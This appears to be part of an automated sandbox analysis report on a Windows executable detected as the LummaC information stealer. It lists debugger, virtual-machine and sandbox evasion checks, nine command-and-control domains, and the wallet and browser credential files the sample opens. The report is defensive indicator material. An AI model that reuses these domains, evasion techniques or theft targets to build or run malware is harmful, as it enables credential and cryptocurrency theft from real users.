Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909EC second address: 53909F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909F2 second address: 53909F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909F6 second address: 53909FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909FA second address: 5390A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3F167h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A21 second address: 5390A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A27 second address: 5390A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A2B second address: 5390A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A2F second address: 5390ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F4BA0D3F15Dh 0x00000010 pushfd 0x00000011 jmp 00007F4BA0D3F160h 0x00000016 and cx, C158h 0x0000001b jmp 00007F4BA0D3F15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov ebx, esi 0x00000026 call 00007F4BA0D3F160h 0x0000002b mov cx, FD91h 0x0000002f pop ecx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 jmp 00007F4BA0D3F166h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F4BA0D3F15Dh 0x00000045 sub ax, 3106h 0x0000004a jmp 00007F4BA0D3F161h 0x0000004f popfd 0x00000050 push ecx 0x00000051 pop edi 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390ACB second address: 5390B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov bh, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F4BA0D39717h 0x00000012 test esi, esi 0x00000014 jmp 00007F4BA0D39716h 0x00000019 je 00007F4C11A36FB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F4BA0D3970Dh 0x00000028 and ecx, 530A2D26h 0x0000002e jmp 00007F4BA0D39711h 0x00000033 popfd 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390BDF second address: 5390BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390BEF second address: 5390BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Special instruction interceptor: First address: E47C6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Special instruction interceptor: First address: EC8E87 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7508	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7604	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7496	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7504	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7484	Thread sleep time: -40020s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Last function: Thread delayed

Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696503903p
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NVMware2
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: NTICE
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: SICE
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat

Source: jSFUzuYPG9.exe, 00000000.00000002.1975085759.0000000000E69000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: nProgram Manager

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: jSFUzuYPG9.exe	String found in binary or memory: Wallets/Electrum
Source: jSFUzuYPG9.exe	String found in binary or memory: Wallets/ElectronCash
Source: jSFUzuYPG9.exe	String found in binary or memory: window-state.json
Source: jSFUzuYPG9.exe, 00000000.00000003.1451476737.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyn
Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: jSFUzuYPG9.exe	String found in binary or memory: Wallets/Ethereum
Source: jSFUzuYPG9.exe, 00000000.00000003.1477686530.00000000016A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db	Jump to behavior
